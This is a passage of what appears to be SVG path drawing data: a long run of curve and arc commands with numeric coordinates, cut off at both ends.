-3.5a45.32,45.32,0,0,1,5.2.8c-1-.7-1.8-1.3-3.3-.9a20.16,20.16,0,0,0-2.3-.8c4.6.8,5,.2,1.8-.3,3.7.6-2.4-.8.9-.2,3.3.4,2.8,1,4.6,1.7,2.9.1-1-1.3-1.9-2,4.7,1.2-.3-.9,2.7-.4,1.8.3,2.5,1.1,4.4,1.1-3.4-1-1.8-1.3-7-2.5,6.9.5-7.2-3.1,1.7-2.5-3.3-.7-1.8-1-.5-1.1,2.4.4-.2.6,4.4,1.2-.5-.5-2.1-1-4.6-1.5.2-.2,2.7.2,2.9,0-1.9-.3-3.9-1.2-2.4-1,1.2.2,1.2.4,1.2.5a10.4,10.4,0,0,0,4,.3c-1.6-.3-3.9-.6-4.3-.8a47.94,47.94,0,0,0,9.8.2c-5.3-.9,1.7-.4-4.5-1.3-.1.4,3.1,1.5-.8.4-2.4-.1,1.8,1-.6.8a15.24,15.24,0,0,1-2.1-.4c-.8-.7,5.2-.1,1.3-1.3-.1.1.3.4-.9.2a8,8,0,0,0-1.2-.4c.3-.2,4,.6,2.9,0-5.6-.6.1-1.1-7.9-2.4,3.8.4-.8-.3-.3-.7a19.35,19.35,0,0,0,2,.2c1.9.3,3.8,1.2,5.4,1.1-2.6-.5.1-.7-3.5-1.2.9.3-1.8.2-2-.1-1.3-.6,6.1.5,1.7-.6a5.55,5.55,0,0,1-2.1-.2c3.1,0,.8-.8,1.4-1.2a16.44,16.44,0,0,0,4.6,1.7c-1-.7.2-.7,2.7-.4-3.7-.7-5.3-.6-6.3-1.2,3.1.5.9-.5,3.9,0-3.6-.4-5.6-1.3-6.4-1.2,3.8,1-2.6-.4-2-.1,1.7.2,2,.9.3.6.3-.2-2.5-1.2-3.4-1.1,2.6.4.4.4-.9.2a4.69,4.69,0,0,1-.6-.2l1.2-.6a13.09,13.09,0,0,0,3.9.1c-1.6-.3-2.6-.4-3.4-.5.3-.2.5-.4.4-.7a11.17,11.17,0,0,0,2.7.8c-1.4-.8-2.1-1.9,1.1-1.7,1.4.9.6.9-1.4,1.1,5.7.9,6.9,1.3,12.8,2.5.6-.3-3.3-1.3-3.5-1.2-1.2.1,4.3,1.1,1.3.7-3-.6-4.9-1-5.5-1.5,3.4.3.5-.4,1.7-.6,4.2.9,2,0,4,.3,2.1.6.2.3.3.6,6.5,1-.1-.5-.4-.8,1.8.3,3.3.6,4.2.8a5.7,5.7,0,0,0-2.3-.8c-1.2.3-9.2-1.6-7.7-1.9a26.05,26.05,0,0,1,5.2.8c.1-.2-1.3-.5-1.3-.7,3.8.7,2.6,0,6.1.6-1.4-.7-.2-.6-3.5-1.2-3-.4-.1.4-1.9.1-1.6-.3-4-1.2-1.4-.9,3.4.6,5.6,1.2,6.2.8-5.4-.6-.8-.3-3.3-.9a41.57,41.57,0,0,1-7.2-.9c-.7-.8,1.5-.6,1.5-1,1.3.5,1.1.9,3.6,1.5,3.7.1-2.3-1.7,2.3-1.3-2.6.1,2.7.9,4.6,1.5,1.3-.1,3.3.7,4.1.6a16.33,16.33,0,0,1-4.4-1.1c3.3.5,4.5.1,7.1.7-1.6-.8-6.3-2.3.2-1.8,1.1.4-3-.1.2.5,0-.1.8,0,1.1.2.5.4-4.8-.9-3-.2,5.3,1,4.4,1.7,7,2.6-2.9-.6-1.9-.1-3-.2a11.42,11.42,0,0,1,3.1.8,3.7,3.7,0,0,0,1.1.1,5.44,5.44,0,0,1-1.1-.3c-.4-.1-.3-.1,0-.1.7,0,2.4.2,1.9,0a6.07,6.07,0,0,1-1.9-.5c-.3-.1-.2-.2,0-.3s1-.3,0-.7a4.76,4.76,0,0,0-.9-.3,3,3,0,0,1,.9.2,18.66,18.66,0,0,1,3.4.7c-.3,0-2.4,0,.2.5.2-.2,1.5-.2.7-.7-1.9-.3-2.5-.5-2.3-.7-.8-.1-1.4-.2-2-.3a14.26,14.26,0,0,1-3.4-.8c1.6.2,2.6.5,3.4.6s1.4.3,1.8.1c-.6-.1-1.2-.3-1.8-.4-3.5-.8-6.3-1.5-9.1-2.2,3.4.7,2.5.2,4.1.5a2.76,2.76,0,0,0,1.2.4c-1.3-.7,2.9.6,3.9.5h0c-6.8-1.3-1.7-.7-6.5-1.9,3.4.7,2.2.5,4.2.6.4.6.3.2,2.4.5.3,0,.5.1.8.1A8.44,8.44,0,0,0,880,5a16.62,16.62,0,0,0-2-.3q-.45,0,0,.3a5,5,0,0,0,1.2.3c.3-.2,5.5.8,6.3,1a20.88,20.88,0,0,0-5.8-2c.7-.4,1.3-.8,5.9.2.3.3-2.2-.1-2.9,0,2.8.9,3.8,1.6,5.9,2.2-1.8-.6,4.4.4,4.1.6-1.3.1-4.4.1-.7.7-5.8-.8-3.1.4-7.9-.3-.3.3,2.8.9,4.5,1.3-2.7-.4-1.5.2-2.9.1a19.45,19.45,0,0,0-5.1-.6c3.2.6-1.6.5,1.3.7a6.05,6.05,0,0,1,1.9,0c-.3.3,1.7.7,2.4,1.1,3.6.6,1.4-.3,6.1.7a2.68,2.68,0,0,1-1.8.3c-.7-.4-1.9,0-4.1-.5,1.6.7.2.6.6,1.2,5.6.9.4-.4,1.6-.7,8,1.3,6.8.2,13.1,1.1-1.2-.6-4.9-1.1-1.4-.9l-5.2-.9c-.3.3,3.3.8,2.4,1.1a8.82,8.82,0,0,1-2.9,0c-.5-.4-1.7-.7-2.6-1.3,3.7.7.9-.4,3.9.1-7.5-1.1-3.6.3-9.8-.3,1.4-.3,2.1-1,9.5-.3-.4-.3-1.7-.2-2.2-.5,1.1.2,1.2,0-.1-.2.6.3-2.5.1-3-.2,1.4-.1,1.4-.5,3.8-.3,2.2.4,1.2.6,3.4,1,.5-.1,1.4,0,1.9-.1-2.1-.4-6.9-1.5-3.4-1.1,1.9,1,1.7-.8,7,.5-.6-.4-3.5-.9-2.5-1.2,4.5,1,1.8.1,4,.3,2.2,1.6,4.5,3.7-2.5,2.9,1.2.9.6,1.1,1.8,1.7,1.4.2,2.3.4,3.2.6-.3-.4,4.5.5,5,.3-3.1-.4-5.1-.7-6.3-1,.7-.2-3.5-1.2-.4-.8,1.3.3,1.4.6,1.4.9,3.9.5,8.6.7,5.7-.3,0,.3.1.6-2.9.1.7-1.2-3.9-3.6,4.7-2.5.9.1,1.8.2,3,.4-4.1-.9,5.8.5.7-.7-1.1-.1-.1.4-3-.2a.74.74,0,0,0-.7-.3,9.16,9.16,0,0,1-2.5-.2c-.1-.2-.2-.5-.3-.7-4.5-.8-3.2,0-7.1-.6,3-.3,15.4.5,4.1-1.5a.26.26,0,0,0-.1-.2c2.5.3,4.5,1.1,5.2.9-1.6-.4-3.4-.7-3.4-1,4.7.8-1.1-.7,1.7-.5l2.4.7c2.5.9,2.4,1.6,1.9,2.1a9.18,9.18,0,0,1,2.2.6c4.2.9,5.2.4,7.3,1.1-2-.1-2-.2.2.4-2.9-.4-3.9-.2-3.7.3,5.7,1-.1-.4,2.9-.1,5.7,2.1-1,1.4,1.4,2.9,4.8,1,2.7,1.1,7.6,1.8-4-.5-6.4-.6-8.4-1.4-.8.2,3.2,1.3,4.5,1.3-.9-.3,2.8.7,3,.2a14.34,14.34,0,0,1,3.5,1.2c-1.9-.1-1.9-.4-5.2-.9-.4.4-.4.3.4.8,1.4.5,3.8.4,5.3,1a25.66,25.66,0,0,0-4.8,0c6.8,1.7,2.8,1.9,3.2,2.8-2.5-.5-7.1-1-4-.3,1.4.1,3.5.3,6.1.7-1.6.1-3.3-.1-.6.8-5.5-.9.3.6-3.8.1,1.6.3,5.4.8,5.3,1a.35.35,0,0,0,.1.2c-3.8-.6-5.1-1.1-8.5-1.6-1.3.2,4.7.8,3.4,1,3,.6,2.6.3,5.2.8-.8.4,3.2,1.6-1.3,1.3,4.1.8,2.2.8,3.5,1.2-.7.1-5.1-.9-4-.3,2,.3,2.4.5,4.2.8.1-.1.2-.2,2,.1,7.5,1.6,2.5,1.8,2.1,2.3-.1.1,5.3,2-1.8.4,1.2.5,2,1.1-2.8.2.5-.1,2.4.1,1.8-.4-3.1-.5-3.7-.9-6.5-1.4,1,.7-3-.7-1.9,0,.5.4,5.2.6,6.4,1.2a8.82,8.82,0,0,1-2.9,0c-.3-.2-2.4-.5-3.3-.8-.5.1-2.5.4-.6.8,1.8.2-.3-.6,1.8-.3s8.7,1.7,2.2.5c-.1.4,6.1,1.1,4.5,1.4a17.2,17.2,0,0,0-3.2-.5c.1.4,2.7.4,4.4,1.1a26.83,26.83,0,0,1-4-.3c3.2.9-1.8,1,4.6,1.5a2.68,2.68,0,0,1-1.8.3.17.17,0,0,1-.23.07.18.18,0,0,1-.07-.23l0,0a.16.16,0,0,1,.23,0h-.6c-.8-.2-1.6-.2-3.6-.6.2.2.3.3.3.4h-.3c-.9.2-.7.3,0,.4a6.32,6.32,0,0,1-1.3.4c2.5.6,3.8.3,4.2.7-2.7-.4,1.5.4.2.5-1.5-.2-3.9-.7-4.1-.6.3.5,2.4,1.4-1.5.9-.6-.3.9-.4-1.3-.8-2.9,0,3,1.3.6,1.2,1.4.2,2.8.5,4.2.7-.1.4,4.1,1.5-2.7.4,2.1-.1-3.8-1.5-7.7-1.9,0,.3.9.9-.6.8,1.5.5,3.1.3,4.2.8-1.6.1,4.4,2.1,2,2.2,2.1.2.6-.5,3.9.1,3.8,1.4-2.7,1.2-1,2.1a12.25,12.25,0,0,1,2.9-.1c1.6.8-1.6.7-1.2,1.6.1.2,1.9.4,2.2.6-.1.5-5.3.2-8.8-.2,7,1.3,6.3.5,9.1.7,2.7,1-2.8.3.6,1.3,1.6.2-.5-.6,2.9,0-2.1-1.3-5-2.8.8-2.4-1.8.4.8.4,3.5,1.2-.2.3-4,.2-2.7.6a5.85,5.85,0,0,1,2,.2c2.5.8-2.3.6.5,1-.2-.2.7-.2,1.9,0,2.7,1.4-1.9,1.2,3.2,2.6-7-1.1,1.5,1.9-5.4.9-.6-1.2.4-1.6-1.2-2.6-2.6-.2-2-.7-3.4-1.1-4.9-.2,1.3,1.7,3.1,2.5-1.3-.2-1.4-.1-3.1-.4.5-.3-2-.8-1.5-1.1-1.8-.2-5.6-.9-5.1-.5,2,.4,2.3.2,4.1.6a7.72,7.72,0,0,1,.4,1c-7-1-6.7-1.2-13.7-2.4,0-.1,1.3.1.9-.2a59.9,59.9,0,0,1-12-3c-2.9-.1,4.1,1.1,2.6,1.4a17,17,0,0,0-3.1-.5c3.3.5.7.7,4.4,1.2q-.45-.45,1.8-.3c.1.2,1.9.4,2.2.6,1.1.5-1.5.1-1.8.3a10.32,10.32,0,0,1,2.2.5c4.2.8-1.3-.6,4,.3,6.7,1.6,14.6,2.5,12.1,3.1-5.3-.6-2.6.3-1.4,1.1-1.4-.2-2.3-.4-3.2-.6-.3.2-2.8.7,1.7,1.5,2.3.4-1.5-.5-.3-.6,3.4.7,1.2-.2,4,.3,1.6,1.2-.5,1-5.7.3.4,1.1-2.3,1.2-2.7,2.6,2.5.6,3.8.3,4.2.7-1.7.1.8.6.5,1.1-1.6-.4-2.6-.6-3.1-.4,3.7,1-3.4,0,2.4,1.1-.3.2-3.2-.2-5-.4,1.4.4,3.9.8,5.4,1.1.5.3,0,.4-.8.4,1.4.4,3.9.8,5.4,1.1-1.1-.6,2-.1,3.9.1.5-.2-1.1-.5-1.4-.7.1,0,.2-.1.3-.1,1.3.2,2.6.4,4,.7.7.5-2.3.1,1.3.8,3.9.2-7.4-2-2.9-2-.5.5,2.8.6,4.4,1.1-.9-.8,9.8-.5,10.1.9,3.6.7,3.7.4,4,.2q-4.05-.6-3.3-.9c-1.9-.4-6.1-.9-6.4-1.2.7-.2,1.7-.4-1.5-1.1,4.7-1,1.1-3.8,2.2-5.6,1,.6,1,.6.4,1,6.1,1,2.7,1,3.5,1.2.9-.2,1.2.5,3.1.5,1,1-.8,1.4,4.2,2.8-.3-.9,6.7,1.5,6.2.8-6.4-1.5-5.3-2.1-1.9-2.1-1.2-.2-3-.5-3.2-.6,3.6.3,3.8,1.1,5.6,1.6A27,27,0,0,0,979,53c1.6.4,3.4.7,3.4,1-.8.3-2.1-.1-.7.7-1.4-.2-2.3-.4-3.2-.6-.1.3,2.5.8,2.4,1.1l-5.3-.9a31.71,31.71,0,0,1,8,2.7c1.6-.4,10.3.2,6.3-1.1,1.8.3,6.3.7,7.3,1.1-2.3.1-3.4-.1-.5.9-1.3-.2-1.5-.4-3.2-.6.4,1-7.2-.8-6.7.2a51.94,51.94,0,0,1,5.5,1.5c.5-.2,4.9.8,5.3,1-2.1-.1-2.7,0,1.2.4-2.3,0-.3,1.3-4.5.8-2.5-.4-3.2-.7-6.4-1.2-3.1-1.1-1.5-1.9-2.2-2.7a37.31,37.31,0,0,0-4.1-.5q3.45.6,3.3.9a52.82,52.82,0,0,1-5.3-.9c.3.3.5.6-1.8.3-.1-.2-.1-.3-.2-.5-5.2-.9-7.1-.4-5.7.2a12,12,0,0,1,3,.2c.3.2,1.8.5,2.3.7-.6.3-3.6-.5-5.1-.5,3,.7-2.3-.3-2-.1,1.6.4,3.4.7,3.4,1-1.6-.2-3.9-.7-4.1-.6,8.6,2.5-5.1.9,2.6,3.4a12.75,12.75,0,0,0-3.9-.1c3.9.6,5.7.7,9.3,1.2-.5-.6-1.4-1.8,3.3-1.2.3.3,2.6,1.1-.6.8,1.6.3,3.9.6,4.3.8-1.8.9,3.4,3.4-.1,3.9.2-.2,4.6.7,5.1.6-4.3-1.1-3.3-1.5.4-1.3-3.7-1.3-2.3-2.3-3.4-3.2,5.8.9,6.7.1,11.1,1,.5-.2-1.8-1.2.5-.9.4.4,3.5.9,4.5,1.3.8-.1,2.2-.1,1.6-.6,2.6.5,3.4.8,4.1.6-.7-1-2.6-2.4,3.8-2.3,6.1,1.2,2.8,1.4,4.9,2.1,1.9-.1,0,.5,2.3.8.1-.3,6.4.8,7.3,1.2-.8.1-2.4,0-6.1-.7.3.3.5.7,3.4,1.1-2.2-1,5.5.8,5.1.5a19,19,0,0,1-3.3-.9c6.1,1,.3-.5-1.5-1,3,.2-4.4-2.3,2.1-1.8,1.4.6,2.5,1,1.5,1.1,4.3.8,6.6,1.5,7.8,2.2-2-.1-2.1-.4-4.3-.8.6.4,6.7,1.9,1.5,1.3a9.61,9.61,0,0,0-3.4-1c3.3,1.2,9.9,2.8,10.3,3.5,1.8.3,3.2.5,4.1.6,2.1,1.4,8.2,3.5,2.3,2.9.9.5-.8.9,1.7,1.5.7-.3,5.8.6,4.9.1a66,66,0,0,0,6.7,2c-2.3-.3-1.5.2-1.8.5-.1.1-.3.1-.9.1a2.7,2.7,0,0,0-.8-.1c-1.2-.3.9-.4-1.5-.7-1.7,0-2.6.2-3,.6-1.1.9,1.1,2.6-3.2,2.7-3.2-.8,2.5-.5-2.7-1.6-2.3,0-.8.9-3.4,1-3.9-.6-4.7-1-4.5-1.3,6.2,1,2.3-1.1,10,.7-2.6-1-3.5-1.7.3-1.5-.1,0-.2-.1-.4-.1-1.1-.3-3.7-.7-3-.9a15.44,15.44,0,0,1,3.3.8c-4.8-1.4-1.7-2.9-7-4.6a37.91,37.91,0,0,0,4.1.5c-2.5-.5-3-.9-5.5-1.4,1.3.6-2,0-2.9.1,1.5.3,3.9,1.2,1.4.9s-1.3-.5-3.3-.9c-.2.1.1.2-.9.1a2.67,2.67,0,0,0-1.2-.4c-.1.5,6.8,2.3,1.8,1.7.9-.3-3.6-.8-4.4-1.2,2.2-.1-1.8-1.6-2.9-2,1.4.9-5.6-.4-6.9-.1-1.7-.7,2.8.2,1.8-.3a49.24,49.24,0,0,0-10.2-1.1c.6-.2-2.3-.6-3.3-.9-1.5,0,.3,1-5-.3-.2.3,1.6,1.1-1.7.6-2.3-.6-.1-.9-4.6-1.7,13.3,4.2-14.6.3-5,3.7-5-1-4.5-.5-6.1-.6-3.9-.8-6.9-1.6-9.8-2.4,1.9.1,0-.3-.3-.6,1.7,0,4.1.7,4,.3-1.8-.3-3.2-.5-4.1-.6-.8-.6.6-.6,1.4-1.2-3.6-.8-3.7-1.1-7.5-1.6,1.8,1.1-2.2.7,3,2.3-2.3-.7-10.8-1.5-5-.3.1-.2-.6-.5.8-.3,1.6.3,3.8.6,4.2.8-.8.3,3.6,1.4-1.7.5,1.3.1,1.2-.2-1.3-.7.1.4-1.9-.3-3-.2,2.9.8,3.6,1.8.7,1.6-1.1-.2-2.1-.3-3.1-.5,2-.2-7.3-2-2.4-.9-2.4.4,6.9,2.3,10.1,3,.6.4-3.9-.5-4-.3,4.8.8,5.1,1.5,7.8,2.2-.5-.3,3.7.2,4.1.6-1.8.4,1,2.2-2.9,2.1-1.9-.4-3.4-.9-4.2-.7,7.2,1.2-1.6.7,1.7,1.5,3.6.7,1.1-.3,5.1.5-.5.3,1.6.7,3.4,1.1a13.75,13.75,0,0,1,2.2.6c-3.6-.1-2.1,1.5.1,2.4,3.5.4-1.5-.9,2.8-.3,2.2.5,6.6,1.2,8.6,1.8-1.2,0,.8.9,2.6,1.4a6,6,0,0,1,4.1.6c1.6-.7-2.4-1.9-1.2-2.7a39.56,39.56,0,0,1-4.3-.9c1.8.2-.3-.6,1.8-.3,3.7.6,1.6.9,5.6,1.6.7-.2-4-2,1.5-1l-.3-.6c-7.3-1.2-4.1-2.1,1.6-.7.8-.4-1.4-1.6,4.6-.6-2,.3-1.3,1,2,2.1.3-.2,2.9.3,1.8-.3-2.8-.4-2.1-.6-3.3-.9,2.4.4.8-.4,2.9-.1,3.4.7,3.2.3,5.1.6,3.3,1.1-.7,1-1.3,1.3,4.1.7.6-.5,3.9,0,1.7.3.7.4,2.3.7,2.3.3-.9-.9,1.6-.6,1.5.5,1.1.9,4.6,1.5a32.09,32.09,0,0,1-4.7.2c3.7.4,4.6,1.3,10.8,2.5-4.2-1.2-9.4-2.9-1.9-2.1-1.6-.8-2.3-1.8,1.2-1.6a38,38,0,0,0,5.6,1.6c4.4.5-3.5-1.4-.6-1.3.2.2.4.3,2.2.6.1-.3-2.2-.7-3.4-1.1a31.24,31.24,0,0,1,7.2,1c-3.5.8.5,2.7-5.3,3.1-2.3-1.3,5.4-.9-2.2-2.6,3,1-2.9.2,1.6,1.3-1.6.2-6.2-.5-3.7.4-1.1-.6,2.7.3,3.1.5-1,.2-1.1.1-1.7.5,5.6,1,3,1.6,9,2.6-6.5-2.2.5-2.1,4.7-2.3-1.7-.6-4.2-.5-5.3-1a12,12,0,0,1,3,.2c5.3,1.2,3.9.6,9.3,1.2,2,1-4.8-.4-4.9,0,.7.4,5.4,1.6,3.6,1.5a21,21,0,0,1-2.2-.6c-.5.1-1.4,0-1.9.1a24.16,24.16,0,0,1,4.3.9c-5.2-.8-8.7-1.1-9-.6,1.8.3,2.6.3,3.2.5-2.2,0-1.9.7-4.6.6,3.5.8.1.5,2.6,1.3-4.8-.8.8,1.1-3.7.4.8.2,1.3.3,1.2.4,10.3,1.9,2.8-1,8.5-.4-.4.6,2.4.8,3.2.6,5.6,1.8-7.7.5-1.2,1.7-.2.2-5.5.1-2.7.4,1.5-.3.8,0,5.2.8,2.2.3-2.6-1.1.6-.8,1.5.3,1.1,1,2.3.8-.9-.6-.1-.5-2.5-1.2,1.1,0,3.9.5,5.1.5-.9-.3-5.1-.8-4.4-1.1,11.2,1.7,4.3-.9,9.4-.7,3.9,2.2,1,3.2,2.1,4.5a6.26,6.26,0,0,1,2.1.4c.1.1.1.2.2.4-2.4-.4-4-.7-5.2-.8,2.6.9-2.2.1-2.7.4,2.9,1.3,1.2,3.2-1.3,3.5-.3.5,2.1,2.8-4.8,2.2,1.6.3,3.9.6,4.3.8a23.15,23.15,0,0,0-4.1,1.5c1.4.3,4,.6,4.2.8-.9.1-3.8-.4-5-.4,6.8,1.7-3.7.7,1,2.2,5.1.7,1.4-.3-.2-.5a2.7,2.7,0,0,1,1.8-.3c.1.5,1.6.3,3.1.5,1.3.4,1.3.5.2.5,8.3,1.4.4-1.1.2-1.6s7.8,1,6.9.3a15,15,0,0,0-3-.3c-1.6-.8-3.9-1.8.3-1.4.9.5,4.4.8,4.1.5-2.6-.6-1.2-.6-3.6-1.4,5.1,1.1.6-.6,6.2.8-.3-.6-3.1-.7-4.5-1.3,4.2.4-.8-.1-1.3-.7a20.19,20.19,0,0,1,4.1.6c.5-.5-2.8-1.5-.7-1.6-1.5-.4-3.3-.7-4.4-1.1,1.1-.3,2.3-.5,1.3-1.3,8,1.4,6.8-.5,12.6,0-1.07-.15-2.14-.35-3.2-.6.2-.3,6.1.8,2.9-.1-3.6-.7-1.1.3-5.1-.5-1.3-.8-4.5-2.4-2.2-2.6-1.1.2,4,1.3,4.4,1.2-1.7-.6-4.4-1.2-4.6-1.7,1.4.3,3.9.8,5.4,1.1,1.1-.4-1.9-1.6-.8-1.8a9.18,9.18,0,0,1,2.2.6c1.3,1-3.2,1.5,2.3,2.8-1.9-1.1,3.1-1.3-.4-2.8,5.8,1-2.5-1.9,4.4-1.1-5.2-2-2-3.5,2.2-3.6a12.82,12.82,0,0,0,2.1.5,4.69,4.69,0,0,0-2.4-1.1c-.1.1-.2.2-2-.1-.4-.8,1-.8.3-1.4,1.6.3,2.7.6,4.3.9-1.7-1,3.2-.1,1.4-1.1-2.9-.4-2.8-.1-5.2-.9,3,.5,2.5.1,4,.2-1.7-.5-4.3-.5-5.3-1.1.4-.6-.8-.8-1.8-1.7,4.1.7,3.6-.1,7.2.9.3-.6,2.8-.4-1.7-1.5,3.3.7,4,.4,7.4,1.3.1-.2-1.3-.5-1.3-.7-2.3-.3-5.6-.7-6.4-1.2,1.3-.8,3.8-1.5,1.7-2.7a15.78,15.78,0,0,0-2.4-1c1.8.3,3.3.6,4.3.8l-.3-.6q-4.05-.6-3.3-.9c4.5,1,1.9.1,6.2.8,2.1.7.6.8-.9.9a4.82,4.82,0,0,0-1.5.3c5.8,1.2,4.4,2.3,1.6,2.1,5.9.5,5.3-1.2,3.4-1.9a22.29,22.29,0,0,1,2.7-.2c1.7-.1,3.3-.3,3.6-.8a9.76,9.76,0,0,1-3.3-.9c-3.2-.6-3-.3-6.2-.9-1.3.2,3,.7,2.4,1-5.1-1-2.4.1-7.2-.9.6-.4,4.9-.4-.7-1.6l-.3-.6c1.4.3,3.9.8,5.4,1.1.2-.6-5.5-.8-5.5-1.5,1.7.1,4.3.5.8-.3,3.4.2,5.8,1.2,7.4,1.2-1.7-.3-2.1-1.1-.4-.8a24.16,24.16,0,0,1,4.3.9c-5.4-1.1.8.8.5,1.1-1.5-.1-4.2-.6-5.1-.5,5.1.9.8.7.4.8,6.7,1,5.1.1,5.8,0,3.3.5.9.5,4.5,1.3-1.1-.6-4.2-1.6.5-1-2.7-.5.7-.7-4.5-1.3-1.3.1,3.1,1.1.3.7-4.9-1.3.3-.7,1.5-.9-3.5-.7-.6.3-4.1-.5,0-.1-.9-.3-1.2-.4-.6-.7,1.7-.4,4.7-.3-.8-.4-1.6-.1-3.1-.4,0-.2-.6-.3-1.2-.5a17.85,17.85,0,0,1,4,.3c2.7.4,1,.6,4.4,1.1-1-.6-1.4-.8.6-.8-1-.4-4.6-1-4.5-1.3s2.7.2,2.9,0c-1.6-.4-3.1-1.4-.7-1.4-2.1-.5-2.9-.9-4.5-1.3-.8.4,1.7,1.1-1.6.7a13,13,0,0,0-2.3-.7c0,.3,1.8.6,2.4,1-6.5-1.2-.5.6-2.8.3-1.4-.3-2.1-.5-4.2-.8,3,1.1,4.8,2.4-1.1,1.8,6.1.9,1.9,1.5-2.8.2.3.6,3.1.7,4.5,1.3-2-.3-2.5-.2-5.1-.6-5.9-2-1.8-1.9,2.9-2.1-3.3-1.3-1.1-1.2-2.8-1.9,1.1.2,2.1.3,3.1.5-2.9-.6-1.5-1.5-4.7-1.7,2.7.7,1.1,1.1-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4